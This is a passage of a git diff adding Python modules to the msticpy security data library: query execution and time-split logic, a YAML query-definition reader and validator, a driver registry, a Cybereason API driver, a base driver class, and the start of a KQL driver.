+        print(f"Running query for {len(self._additional_connections)} connections.")
+        for con_name, connection in self._additional_connections.items():
+            print(f"{con_name}...")
+            try:
+                results.append(
+                    connection.query(query, query_source=query_source, **query_options)
+                )
+            except MsticpyDataQueryError:
+                print(f"Query {con_name} failed.")
+        return pd.concat(results)
+
+    def browse_queries(self, **kwargs):
+        """
+        Return QueryProvider query browser.
+
+        Other Parameters
+        ----------------
+        kwargs :
+            passed to SelectItem constructor.
+
+        Returns
+        -------
+        SelectItem
+            SelectItem browser for TI Data.
+
+        """
+        return browse_queries(self, **kwargs)
+
+    # alias for browse_queries
+    browse = browse_queries
+
+    @property
+    def query_time(self):
+        """Return the default QueryTime control for queries."""
+        return self._query_time
+
+    def _execute_query(self, *args, **kwargs) -> Union[pd.DataFrame, Any]:
+        if not self._query_provider.loaded:
+            raise ValueError("Provider is not loaded.")
+        if not self._query_provider.connected:
+            raise ValueError(
+                "No connection to a data source.",
+                "Please call connect(connection_str) and retry.",
+            )
+        query_name = kwargs.pop("query_name")
+        family = kwargs.pop("query_path")
+
+        query_source = self.query_store.get_query(
+            query_path=family, query_name=query_name
+        )
+        if "help" in args or "?" in args:
+            query_source.help()
+            return None
+
+        params, missing = extract_query_params(query_source, *args, **kwargs)
+        self._check_for_time_params(params, missing)
+        if missing:
+            query_source.help()
+            raise ValueError(f"No values found for these parameters: {missing}")
+
+        split_by = kwargs.pop("split_query_by", None)
+        if split_by:
+            split_result = self._exec_split_query(
+                split_by=split_by,
+                query_source=query_source,
+                query_params=params,
+                args=args,
+                **kwargs,
+            )
+            if split_result is not None:
+                return split_result
+            # if split queries could not be created, fall back to default
+        query_str = query_source.create_query(
+            formatters=self._query_provider.formatters, **params
+        )
+        # This looks for any of the "print query" debug args in args or kwargs
+        if any(db_arg for db_arg in _DB_QUERY_FLAGS if db_arg in args) or any(
+            db_arg for db_arg in _DB_QUERY_FLAGS if kwargs.get(db_arg, False)
+        ):
+            return query_str
+
+        # Handle any query options passed
+        query_options = self._get_query_options(params, kwargs)
+        return self.exec_query(query_str, query_source=query_source, **query_options)
+
+    def _check_for_time_params(self, params, missing):
+        """Fall back on builtin query time if no time parameters were supplied."""
+        if "start" in missing:
+            missing.remove("start")
+            params["start"] = self._query_time.start
+        if "end" in missing:
+            missing.remove("end")
+            params["end"] = self._query_time.end
+
+    @staticmethod
+    def _get_query_options(
+        params: Dict[str, Any], kwargs: Dict[str, Any]
+    ) -> Dict[str, Any]:
+        """Return any kwargs not already in params."""
+        query_options = kwargs.pop("query_options", {})
+        if not query_options:
+            # Any kwargs left over we send to the query provider driver
+            query_options = {
+                key: val for key, val in kwargs.items() if key not in params
+            }
+        return query_options
+
+    def _read_queries_from_paths(self, query_paths) -> Dict[str, QueryStore]:
+        """Fetch queries from YAML files in specified paths."""
+        settings: Dict[str, Any] = config.settings.get(  # type: ignore
+            "QueryDefinitions"
+        )  # type: ignore
+        all_query_paths = []
+        for default_path in settings.get("Default"):  # type: ignore
+            qry_path = self._resolve_package_path(default_path)
+            if qry_path:
+                all_query_paths.append(qry_path)
+
+        if settings.get("Custom") is not None:
+            for custom_path in settings.get("Custom"):  # type: ignore
+                qry_path = self._resolve_path(custom_path)
+                if qry_path:
+                    all_query_paths.append(qry_path)
+        if query_paths:
+            for custom_path in query_paths:
+                qry_path = self._resolve_path(custom_path)
+                if qry_path:
+                    all_query_paths.append(qry_path)
+
+        if not all_query_paths:
+            raise RuntimeError(
+                "No valid query definition files found. ",
+                "Please check your msticpyconfig.yaml settings.",
+            )
+        return QueryStore.import_files(
+            source_path=all_query_paths,
+            recursive=True,
+            driver_query_filter=self._query_provider.query_attach_spec,
+        )
+
+    def _add_query_functions(self):
+        """Add queries to the module as callable methods."""
+        for qual_query_name in self.list_queries():
+            query_path = qual_query_name.split(".")
+            query_name = query_path[-1]
+            current_node = self
+            for container_name in query_path[:-1]:
+                container_name = valid_pyname(container_name)
+                if hasattr(current_node, container_name):
+                    current_node = getattr(current_node, container_name)
+                else:
+                    new_node = QueryContainer()
+                    setattr(current_node, container_name, new_node)
+                    current_node = new_node
+
+            query_cont_name = ".".join(query_path[:-1])
+
+            # Create the partial function
+            query_func = partial(
+                self._execute_query, query_path=query_cont_name, query_name=query_name
+            )
+            query_func.__doc__ = self.query_store.get_query(
+                query_path=query_cont_name, query_name=query_name
+            ).create_doc_string()
+
+            query_name = valid_pyname(query_name)
+            setattr(current_node, query_name, query_func)
+            setattr(self.all_queries, query_name, query_func)
+
+    def _add_driver_queries(self, queries: Iterable[Dict[str, str]]):
+        """Add driver queries to the query store."""
+        for query in queries:
+            self.query_store.add_query(
+                name=query["name"],
+                query=query["query"],
+                query_paths=query["query_container"],
+                description=query["description"],
+            )
+        # For now, just add all of the functions again (with any connect-time acquired
+        # queries) - we could be more efficient than this but unless there are 1000s of
+        # queries it should not be noticeable.
+        self._add_query_functions()
+
+    def _exec_split_query(
+        self,
+        split_by: str,
+        query_source: QuerySource,
+        query_params: Dict[str, Any],
+        args,
+        **kwargs,
+    ) -> Union[pd.DataFrame, str, None]:
+        start = query_params.pop("start", None)
+        end = query_params.pop("end", None)
+        if not (start or end):
+            print(
+                "Cannot split a query that does not have 'start' and 'end' parameters"
+            )
+            return None
+        try:
+            split_delta = pd.Timedelta(split_by)
+        except ValueError:
+            split_delta = pd.Timedelta("1D")
+
+        ranges = self._calc_split_ranges(start, end, split_delta)
+
+        split_queries = [
+            query_source.create_query(
+                formatters=self._query_provider.formatters,
+                start=q_start,
+                end=q_end,
+                **query_params,
+            )
+            for q_start, q_end in ranges
+        ]
+        # This looks for any of the "print query" debug args in args or kwargs
+        if any(db_arg for db_arg in _DB_QUERY_FLAGS if db_arg in args) or any(
+            db_arg for db_arg in _DB_QUERY_FLAGS if kwargs.get(db_arg, False)
+        ):
+            return "\n\n".join(split_queries)
+
+        # Retrive any query options passed (other than query params)
+        # and send to query function.
+        query_options = self._get_query_options(query_params, kwargs)
+        query_dfs = [
+            self.exec_query(query_str, query_source=query_source, **query_options)
+            for query_str in tqdm(split_queries, unit="sub-queries", desc="Running")
+        ]
+
+        return pd.concat(query_dfs)
+
+    @staticmethod
+    def _calc_split_ranges(start: datetime, end: datetime, split_delta: pd.Timedelta):
+        """Return a list of time ranges split by `split_delta`."""
+        # Use pandas date_range and split the result into 2 iterables
+        s_ranges, e_ranges = tee(pd.date_range(start, end, freq=split_delta))
+        next(e_ranges, None)  # skip to the next item in the 2nd iterable
+        # Zip them together to get a list of (start, end) tuples of ranges
+        # Note: we subtract 1 nanosecond from the 'end' value of each range so
+        # to avoid getting duplicated records at the boundaries of the ranges.
+        # Some providers don't have nanosecond granularity so we might
+        # get duplicates in these cases
+        ranges = [
+            (s_time, e_time - pd.Timedelta("1ns"))
+            for s_time, e_time in zip(s_ranges, e_ranges)
+        ]
+
+        # Since the generated time ranges are based on deltas from 'start'
+        # we need to adjust the end time on the final range.
+        # If the difference between the calculated last range end and
+        # the query 'end' that the user requested is small (< 10% of a delta),
+        # we just replace the last "end" time with our query end time.
+        if (ranges[-1][1] - end) < (split_delta / 10):
+            ranges[-1] = ranges[-1][0], end
+        else:
+            # otherwise append a new range starting after the last range
+            # in ranges and ending in 'end"
+            # note - we need to add back our subtracted 1 nanosecond
+            ranges.append((ranges[-1][0] + pd.Timedelta("1ns"), end))
+        return ranges
+
+    @classmethod
+    def _resolve_package_path(cls, config_path: str) -> Optional[str]:
+        """Resolve path relative to current package."""
+        if not Path(config_path).is_absolute():
+            config_path = str(Path(__file__).resolve().parent.joinpath(config_path))
+        if not Path(config_path).is_dir():
+            print(f"Warning: Custom query definitions path {config_path} not found")
+            return None
+        return config_path
+
+    @classmethod
+    def _resolve_path(cls, config_path: str) -> Optional[str]:
+        """Resolve path."""
+        if not Path(config_path).is_absolute():
+            config_path = str(Path(config_path).expanduser().resolve())
+        if not Path(config_path).is_dir():
+            print(f"Warning: Custom query definitions path {config_path} not found")
+            return None
+        return config_path
diff --git a/msticpy/data/data_query_reader.py b/msticpy/data/data_query_reader.py
new file mode 100644
index 000000000..16859f9d3
--- /dev/null
+++ b/msticpy/data/data_query_reader.py
@@ -0,0 +1,129 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Data query definition reader."""
+from typing import Tuple, Dict, Iterable, Any
+from pathlib import Path
+import yaml
+
+from .query_defns import DataEnvironment
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def find_yaml_files(source_path: str, recursive: bool = False) -> Iterable[Path]:
+    """
+    Return iterable of yaml files found in `source_path`.
+
+    Parameters
+    ----------
+    source_path : str
+        The source path to search in.
+    recursive : bool, optional
+        Whether to recurse through subfolders.
+        By default False
+
+    Returns
+    -------
+    Iterable[str]
+        File paths of yanl files found.
+
+    """
+    recurse_pfx = "**/" if recursive else ""
+    file_glob = Path(source_path).glob(f"{recurse_pfx}*.yaml")
+    for file_path in file_glob:
+        if not file_path.is_file():
+            continue
+        yield file_path
+
+
+def read_query_def_file(query_file: str) -> Tuple[Dict, Dict, Dict]:
+    """
+    Read a yaml data query definition file.
+
+    Parameters
+    ----------
+    query_file : str
+        Path to yaml query defintion file
+
+    Returns
+    -------
+    Tuple[Dict, Dict, Dict]
+        Tuple of dictionaries.
+        sources - dictionary of query definitions
+        defaults - the default parameters from the file
+        metadata - the global metadata from the file
+
+    """
+    data_map = None
+    with open(query_file, "r", encoding="utf-8") as f_handle:
+        # use safe_load instead load
+        data_map = yaml.safe_load(f_handle)
+
+    validate_query_defs(query_def_dict=data_map)
+
+    defaults = data_map.get("defaults", {})
+    sources = data_map.get("sources", {})
+    metadata = data_map.get("metadata", {})
+
+    return sources, defaults, metadata
+
+
+def validate_query_defs(query_def_dict: Dict[str, Any]) -> bool:
+    """
+    Validate content of query definition.
+
+    Parameters
+    ----------
+    query_def_dict : dict
+        Dictionary of query definition yaml file contents.
+
+    Returns
+    -------
+    bool
+        True if validation succeeds.
+
+    Raises
+    ------
+    ValueError
+        The validation failure reason is returned in the
+        exception message (arg[0])
+
+    """
+    # verify that sources and metadata are in the data dict
+    if "sources" not in query_def_dict or not query_def_dict["sources"]:
+        raise ValueError("Imported file has no sources defined")
+    if "metadata" not in query_def_dict or not query_def_dict["metadata"]:
+        raise ValueError("Imported file has no metadata defined")
+
+    # data_environments and data_families must be defined at with at least
+    # one value
+    _validate_data_categories(query_def_dict)
+
+    return True
+
+
+def _validate_data_categories(query_def_dict: Dict):
+    if (
+        "data_environments" not in query_def_dict["metadata"]
+        or not query_def_dict["metadata"]["data_environments"]
+    ):
+        raise ValueError("Imported file has no data_environments defined")
+
+    for env in query_def_dict["metadata"]["data_environments"]:
+        if not DataEnvironment.parse(env):
+            raise ValueError(
+                f"Unknown data environment {env} in metadata. ",
+                "Valid values are\n",
+                ", ".join(e.name for e in DataEnvironment),
+            )
+
+    if (
+        "data_families" not in query_def_dict["metadata"]
+        or not query_def_dict["metadata"]["data_families"]
+    ):
+        raise ValueError("Imported file has no data families defined")
diff --git a/msticpy/data/drivers/__init__.py b/msticpy/data/drivers/__init__.py
new file mode 100644
index 000000000..8cdea866e
--- /dev/null
+++ b/msticpy/data/drivers/__init__.py
@@ -0,0 +1,50 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Data provider sub-package."""
+import importlib
+from typing import Union
+
+from ..query_defns import DataEnvironment
+
+# flake8: noqa: F403
+from .driver_base import DriverBase
+
+from ..._version import VERSION
+
+__version__ = VERSION
+
+_ENVIRONMENT_DRIVERS = {
+    DataEnvironment.LogAnalytics: ("kql_driver", "KqlDriver"),
+    DataEnvironment.AzureSecurityCenter: ("kql_driver", "KqlDriver"),
+    DataEnvironment.SecurityGraph: ("security_graph_driver", "SecurityGraphDriver"),
+    DataEnvironment.Kusto: ("kusto_driver", "KustoDriver"),
+    DataEnvironment.MDATP: ("mdatp_driver", "MDATPDriver"),
+    DataEnvironment.MDE: ("mdatp_driver", "MDATPDriver"),
+    DataEnvironment.LocalData: ("local_data_driver", "LocalDataDriver"),
+    DataEnvironment.Splunk: ("splunk_driver", "SplunkDriver"),
+    DataEnvironment.Mordor: ("mordor_driver", "MordorDriver"),
+    DataEnvironment.Sumologic: ("sumologic_driver", "SumologicDriver"),
+    DataEnvironment.ResourceGraph: ("resource_graph_driver", "ResourceGraphDriver"),
+    DataEnvironment.M365D: ("mdatp_driver", "MDATPDriver"),
+    DataEnvironment.Cybereason: ("cybereason_driver", "CybereasonDriver"),
+}
+
+
+def import_driver(data_environment: DataEnvironment) -> type:
+    """Import driver class for a data environment."""
+    mod_name, cls_name = _ENVIRONMENT_DRIVERS.get(data_environment, (None, None))
+
+    if not (mod_name and cls_name):
+        raise ValueError(
+            f"No driver available for environment {data_environment.name}.",
+            "Possible values are:",
+            ", ".join(env.name for env in _ENVIRONMENT_DRIVERS),
+        )
+
+    imp_module = importlib.import_module(
+        f"msticpy.data.drivers.{mod_name}", package="msticpy"
+    )
+    return getattr(imp_module, cls_name)
diff --git a/msticpy/data/drivers/cybereason_driver.py b/msticpy/data/drivers/cybereason_driver.py
new file mode 100644
index 000000000..da6339a83
--- /dev/null
+++ b/msticpy/data/drivers/cybereason_driver.py
@@ -0,0 +1,359 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Cybereason Driver class."""
+from typing import Any, Dict, Optional, Tuple, Union, List
+
+import json
+import datetime as dt
+import httpx
+import pandas as pd
+
+from ..._version import VERSION
+from ...common.provider_settings import get_provider_settings, ProviderArgs
+from ...common.exceptions import MsticpyUserConfigError
+from .driver_base import DriverBase, QuerySource
+
+__version__ = VERSION
+__author__ = "Florian Bracq"
+
+_HELP_URI = (
+    "https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html"
+)
+
+
+CybereasonSettings = Dict[str, Dict[str, Union[str, ProviderArgs]]]
+
+
+class CybereasonDriver(DriverBase):
+    """Class to interact with Cybereason."""
+
+    CONFIG_NAME = "Cybereason"
+
+    _CONFIG_NAME_MAP = {
+        "tenant_id": ("tenantid", "tenant_id"),
+        "client_id": ("clientid", "client_id"),
+        "client_secret": ("clientsecret", "client_secret"),
+    }
+
+    def __init__(self, **kwargs):
+        """Instantiate Cybereason driver."""
+        super().__init__(**kwargs)
+        self.base_url: str = "https://{tenant_id}.cybereason.net"
+        self.auth_endpoint: str = "/login.html"
+        self.req_body: Dict[str, Any] = {
+            "queryPath": [],
+            "totalResultLimit": 1000,
+            "perGroupLimit": 100,
+            "perFeatureLimit": 100,
+            "templateContext": "SPECIFIC",
+            "queryTimeout": 2 * 60 * 1000,  # 2 minutes in milliseconds
+        }
+        self.search_endpoint: str = "/rest/visualsearch/query/simple"
+        self._loaded = True
+        self.client = httpx.Client(follow_redirects=True)
+        self.formatters = {
+            "datetime": self._format_datetime,
+            "list": self._format_list,
+        }
+
+        self._debug = kwargs.get("debug", False)
+
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            The query to execute
+        query_source : QuerySource
+            The query definition object
+
+        Returns
+        -------
+        Union[pd.DataFrame, Any]
+            A DataFrame (if successfull) or
+            the underlying provider result if an error.
+
+        """
+        data, response = self.query_with_results(query)
+        if isinstance(data, pd.DataFrame):
+            return data
+        return response
+
+    def connect(
+        self,
+        connection_str: Optional[str] = None,
+        **kwargs,
+    ):
+        """
+        Connect to data source.
+
+        Parameters
+        ----------
+        connection_str: Optional[str], optional
+            Connect to a data source
+        instance : Optional[str], optional
+            Optional name of configuration instance - this
+            is added as a prefix to the driver configuration key name
+            when searching for configuration in the msticpyconfig.yaml
+
+        Notes
+        -----
+        Connection string fields:
+            instance
+            client_id
+            client_secret
+
+        """
+        cs_dict: Dict[str, Any] = {}
+
+        instance = kwargs.pop("instance", None)
+        cs_dict = CybereasonDriver._get_driver_settings(self.CONFIG_NAME, instance)
+        # let user override config settings with function kwargs
+        cs_dict.update(kwargs)
+
+        missing_settings = [
+            setting
+            for setting in ("tenant_id", "client_id", "client_secret")
+            if setting not in cs_dict
+        ]
+        if missing_settings:
+            raise MsticpyUserConfigError(
+                "You must supply the following required connection parameter(s)",
+                "to the connect function or add them to your msticpyconfig.yaml.",
+                ", ".join(f"'{param}'" for param in missing_settings),
+                title="Missing connection parameters.",
+                help_uri=("Connecting to OData sources.", _HELP_URI),
+            )
+
+        # self.auth_endpoint and self.req_body are correctly set in concrete
+        # instances __init__
+        self.client.base_url = httpx.URL(
+            self.base_url.format(tenant_id=cs_dict["tenant_id"])
+        )
+        req_body: Dict[str, str] = {
+            "username": cs_dict["client_id"],
+            "password": cs_dict["client_secret"],
+        }
+
+        # Authenticate and obtain cookie for future calls
+        response = self.client.post(self.auth_endpoint, data=req_body)
+        response.raise_for_status()
+
+        print("Connected.")
+        self._connected = True
+
+        return self._connected
+
+    @staticmethod
+    def _flatten_result(entry: Dict[str, Any]) -> Dict[str, Any]:
+        """
+        Flatten Cybereason result to a format that can be handled by pandas.
+
+        Parameters
+        ----------
+        entry: Dict[str, Any]
+            Entry to flatten
+
+        Returns
+        -------
+        Dict[str, Any]
+
+        """
+        result = {}
+        # Retrieve simpleValues and add them to the output
+        simple_values: Dict[str, Any] = entry.get("simpleValues", {})
+        result = CybereasonDriver._flatten_simple_values(simple_values)
+
+        elt_value = entry.get("elementValues", {})  # List or Dict
+        result.update(**CybereasonDriver._flatten_element_values(elt_value))
+        return result
+
+    @staticmethod
+    def _flatten_simple_values(simple_values: Dict[str, Any]) -> Dict[str, Any]:
+        """
+        Flatten "simpleValues from Cybereason result to a format that can be handled by pandas.
+
+        Parameters
+        ----------
+        simple_values: Dict[str, Any]
+            Entry to flatten
+
+        Returns
+        -------
+        Dict[str, Any]
+
+        """
+        result = {}
+        for name, values in simple_values.items():
+            if values["totalValues"] == 1:
+                if "Time" in name:
+                    result[name] = CybereasonDriver._format_to_datetime(
+                        int(values["values"][0])
+                    )
+                else:
+                    result[name] = values["values"][0]
+            elif values["totalValues"] > 1:
+                result[name] = values["values"]
+        return result
+
+    @staticmethod
+    def _flatten_element_values(
+        element_values: Union[Dict[str, Any], List[Dict[str, Any]]]
+    ) -> Dict[str, Any]:
+        """
+        Flatten "elementValues from Cybereason result to a format that can be handled by pandas.
+
+        Parameters
+        ----------
+        element_values: Union[Dict[str, Any], List[str]]
+            Entry to flatten
+
+        Returns
+        -------
+        Dict[str, Any]
+
+        """
+        result = {}
+        if isinstance(element_values, list):
+            for values in element_values:
+                result[values["elementType"]] = values["name"]
+        elif isinstance(element_values, dict):
+            for key, values in element_values.items():
+                flattened = CybereasonDriver._flatten_result(values)
+                if flattened:
+                    for subkey, subvalues in flattened.items():
+                        result[f"{key}.{subkey}"] = subvalues
+        return result
+
+    # pylint: disable=too-many-branches
+    def query_with_results(self, query: str, **kwargs) -> Tuple[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            The kql query to execute
+
+        Returns
+        -------
+        Tuple[pd.DataFrame, results.ResultSet]
+            A DataFrame (if successfull) and
+            Kql ResultSet.
+
+        """
+        if not self.connected:
+            self.connect(self.current_connection)
+        if not self.connected:
+            raise ConnectionError(
+                "Source is not connected. ", "Please call connect() and retry."
+            )
+
+        if self._debug:
+            print(query)
+
+        json_query = json.loads(query)
+        body = self.req_body
+        body.update(json_query)
+        if "customFields" in kwargs:
+            body.update({"customFields": kwargs["customFields"]})
+        response = self.client.post(self.search_endpoint, json=body)
+
+        self._check_response_errors(response)
+
+        json_response = response.json()
+        if json_response["status"] != "SUCCESS":
+            print(
+                "Warning - query did not complete successfully.",
+                "Check returned response.",
+            )
+            return None, json_response
+
+        result = json_response.get("data", json_response)
+        result = result.get("resultIdToElementDataMap", result)
+        result = [CybereasonDriver._flatten_result(v) for v in result.values()]
+
+        if not result:
+            print("Warning - query did not return any results.")
+            return None, json_response
+        return pd.json_normalize(result), json_response
+
+    # pylint: enable=too-many-branches
+
+    @staticmethod
+    def _check_response_errors(response):
+        """Check the response for possible errors."""
+        if response.status_code == httpx.codes.OK:
+            return
+        print(response.json()["error"]["message"])
+        if response.status_code == 401:
+            raise ConnectionRefusedError(
+                "Authentication failed - possible ", "timeout. Please re-connect."
+            )
+        # Raise an exception to handle hitting API limits
+        if response.status_code == 429:
+            raise ConnectionRefusedError("You have likely hit the API limit. ")
+        response.raise_for_status()
+
+    # Parameter Formatting method
+    @staticmethod
+    def _format_datetime(date_time: dt.datetime) -> int:
+        """Return datetime formatted as timestamp in milliseconds."""
+        return int(date_time.timestamp() * 1000)
+
+    # Parameter Formatting method
+    @staticmethod
+    def _format_to_datetime(timestamp: int) -> Union[dt.datetime, int]:
+        """Return datetime from a timestamp in milliseconds."""
+        try:
+            return dt.datetime.fromtimestamp(timestamp // 1000)
+        except TypeError:
+            return timestamp
+
+    # Parameter Formatting method
+    @staticmethod
+    def _format_list(item_list: List[Any]) -> str:
+        """Return formatted list parameter."""
+        fmt_list = []
+        for item in item_list:
+            if isinstance(item, str):
+                fmt_list.append(f'"{item}"')
+            else:
+                fmt_list.append(f"{item}")
+        return ",".join(fmt_list)
+
+    # Retrieve configuration parameters with aliases
+    @staticmethod
+    def _map_config_dict_name(config_dict: Dict[str, str]):
+        """Map configuration parameter names to expected values."""
+        mapped_dict = config_dict.copy()
+        for provided_name in config_dict:
+            for req_name, alternates in CybereasonDriver._CONFIG_NAME_MAP.items():
+                if provided_name.casefold() in alternates:
+                    mapped_dict[req_name] = config_dict[provided_name]
+                    break
+        return mapped_dict
+
+    # Read values from configuration
+    @staticmethod
+    def _get_driver_settings(
+        config_name: str, instance: Optional[str] = None
+    ) -> Dict[str, str]:
+        """Try to retrieve config settings for Cybereason drivers."""
+        config_key = f"{config_name}-{instance}" if instance else config_name
+        drv_config = get_provider_settings("DataProviders").get(config_key)
+        app_config: Dict[str, str] = {}
+        if drv_config:
+            app_config = dict(drv_config.args)
+
+        if not app_config:
+            return {}
+        # map names to allow for different spellings
+        return CybereasonDriver._map_config_dict_name(app_config)
diff --git a/msticpy/data/drivers/driver_base.py b/msticpy/data/drivers/driver_base.py
new file mode 100644
index 000000000..d51e32117
--- /dev/null
+++ b/msticpy/data/drivers/driver_base.py
@@ -0,0 +1,188 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Data driver base class."""
+import abc
+from abc import ABC
+from collections import defaultdict
+from typing import Any, Callable, Dict, Iterable, Optional, Set, Tuple, Union
+
+import pandas as pd
+
+from ..._version import VERSION
+from ..query_source import QuerySource
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-many-instance-attributes
+class DriverBase(ABC):
+    """Base class for data providers."""
+
+    def __init__(self, **kwargs):
+        """Initialize new instance."""
+        self._kwargs = kwargs
+        self._loaded = False
+        self._connected = False
+        self.current_connection = None
+        self.public_attribs: Dict[str, Any] = {}
+        self.formatters: Dict[str, Callable] = {}
+        self.use_query_paths = True
+        self.has_driver_queries = False
+        self._previous_connection = False
+        self.data_environment = kwargs.get("data_environment")
+        self._query_filter: Dict[str, Set[str]] = defaultdict(set)
+
+    @property
+    def loaded(self) -> bool:
+        """
+        Return true if the provider is loaded.
+
+        Returns
+        -------
+        bool
+            True if the provider is loaded.
+
+        Notes
+        -----
+        This is not relevant for some providers.
+
+        """
+        return self._loaded
+
+    @property
+    def connected(self) -> bool:
+        """
+        Return true if at least one connection has been made.
+
+        Returns
+        -------
+        bool
+            True if a successful connection has been made.
+
+        Notes
+        -----
+        This does not guarantee that the last data source
+        connection was successful. It is a best effort to track
+        whether the provider has made at least one successful
+        authentication.
+
+        """
+        return self._connected
+
+    @property
+    def schema(self) -> Dict[str, Dict]:
+        """
+        Return current data schema of connection.
+
+        Returns
+        -------
+        Dict[str, Dict]
+            Data schema of current connection.
+
+        """
+        return {}
+
+    @abc.abstractmethod
+    def connect(self, connection_str: Optional[str] = None, **kwargs):
+        """
+        Connect to data source.
+
+        Parameters
+        ----------
+        connection_str : Optional[str]
+            Connect to a data source
+
+        """
+        return None
+
+    @abc.abstractmethod
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            The query to execute
+        query_source : QuerySource
+            The query definition object
+
+        Other Parameters
+        ----------------
+        kwargs :
+            Are passed to the underlying provider query method,
+            if supported.
+
+        Returns
+        -------
+        Union[pd.DataFrame, Any]
+            A DataFrame (if successfull) or
+            the underlying provider result if an error.
+
+        """
+
+    @abc.abstractmethod
+    def query_with_results(self, query: str, **kwargs) -> Tuple[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame plus native results.
+
+        Parameters
+        ----------
+        query : str
+            The query to execute
+
+        Returns
+        -------
+        Tuple[pd.DataFrame,Any]
+            A DataFrame and native results.
+
+        """
+
+    @property
+    def service_queries(self) -> Tuple[Dict[str, str], str]:
+        """
+        Return queries retrieved from the service after connecting.
+
+        Returns
+        -------
+        Tuple[Dict[str, str], str]
+            Dictionary of query_name, query_text.
+            Name of container to add queries to.
+
+        """
+        return {}, ""
+
+    @property
+    def driver_queries(self) -> Iterable[Dict[str, Any]]:
+        """
+        Return queries retrieved from the service after connecting.
+
+        Returns
+        -------
+        List[Dict[str, str]]
+            List of Dictionary of query_name, query_text.
+            Name of container to add queries to.
+
+        """
+        return [{}]
+
+    @property
+    def query_attach_spec(self) -> Dict[str, Set[str]]:
+        """Parameters that determine whether a query is relevant for the driver."""
+        return self._query_filter
+
+    def add_query_filter(self, name, query_filter):
+        """Add an expression to the query attach filter."""
+        allowed_names = {"data_environments", "data_families", "data_sources"}
+        if name not in allowed_names:
+            raise ValueError(
+                f"'name' {name} must be one of:",
+                ", ".join(f"'{name}'" for name in allowed_names),
+            )
+        self._query_filter[name].add(query_filter)
diff --git a/msticpy/data/drivers/kql_driver.py b/msticpy/data/drivers/kql_driver.py
new file mode 100644
index 000000000..4b00c52d7
--- /dev/null
+++ b/msticpy/data/drivers/kql_driver.py
@@ -0,0 +1,516 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""KQL Driver class."""
+import json
+import os
+import re
+import warnings
+from datetime import datetime
+from typing import Any, Dict, Iterable, List, Optional, Tuple, Union
+
+import pandas as pd
+from IPython import get_ipython
+
+from ...common.azure_auth import AzureCloudConfig, only_interactive_cred, az_connect
+from ...common.exceptions import (
+    MsticpyDataQueryError,
+    MsticpyImportExtraError,
+    MsticpyKqlConnectionError,
+    MsticpyNoDataSourceError,
+    MsticpyNotConnectedError,
+)
+from ...common.wsconfig import WorkspaceConfig
+from ...common.utility import export
+from ..query_defns import DataEnvironment
+from .driver_base import DriverBase, QuerySource
+
+try:
+    from Kqlmagic import kql as kql_exec
+    from Kqlmagic.kql_engine import KqlEngineError
+    from Kqlmagic.kql_response import KqlError
+    from Kqlmagic.kql_proxy import KqlResponse
+    from Kqlmagic.my_aad_helper import AuthenticationError
+except ImportError as imp_err:
+    raise MsticpyImportExtraError(
+        "Cannot use this feature without Kqlmagic installed",
+        title="Error importing Kqlmagic",
+        extra="kql",
+    ) from imp_err
+
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_KQL_CLOUD_MAP = {
+    "global": "public",
+    "cn": "china",
+    "usgov": "government",
+    "de": "germany",
+}
+
+_AZ_CLOUD_MAP = {kql_cloud: az_cloud for az_cloud, kql_cloud in _KQL_CLOUD_MAP.items()}
+
+_LOGANALYTICS_URL_BY_CLOUD = {
+    "global": "https://api.loganalytics.io/",
+    "cn": "https://api.loganalytics.azure.cn/",
+    "usgov": "https://api.loganalytics.us/",
+    "de": "https://api.loganalytics.de/",
+}
+
+
+# pylint: disable=too-many-instance-attributes
+
+
+@export
+class KqlDriver(DriverBase):
+    """KqlDriver class to execute kql queries."""
+
+    def __init__(self, connection_str: str = None, **kwargs):
+        """
+        Instantiate KqlDriver and optionally connect.
+
+        Parameters
+        ----------
+        connection_str : str, optional
+            Connection string
+
+        Other Parameters
+        ----------------
+        debug : bool
+            print out additional diagnostic information.
+
+        """
+        self._ip = get_ipython()
+        self._debug = kwargs.get("debug", False)
+        super().__init__(**kwargs)
+
+        self.formatters = {"datetime": self._format_datetime, "list": self._format_list}
+        self._loaded = self._is_kqlmagic_loaded()
+
+        os.environ["KQLMAGIC_LOAD_MODE"] = "silent"
+        if not self._loaded:
+            self._load_kql_magic()
+
+        self._schema: Dict[str, Any] = {}
+        self.environment = kwargs.get("data_environment", DataEnvironment.MSSentinel)
+        self.kql_cloud, self.az_cloud = self._set_kql_cloud()
+
+        if connection_str:
+            self.current_connection = connection_str
+            self.connect(connection_str)
+
+    # pylint: disable=too-many-branches
+    def connect(self, connection_str: Optional[str] = None, **kwargs):  # noqa: MC0001
+        """
+        Connect to data source.
+
+        Parameters
+        ----------
+        connection_str : str
+            Connect to a data source
+
+        Other Parameters
+        ----------------
+        kqlmagic_args : str, optional
+            Additional string of parameters to be passed to KqlMagic
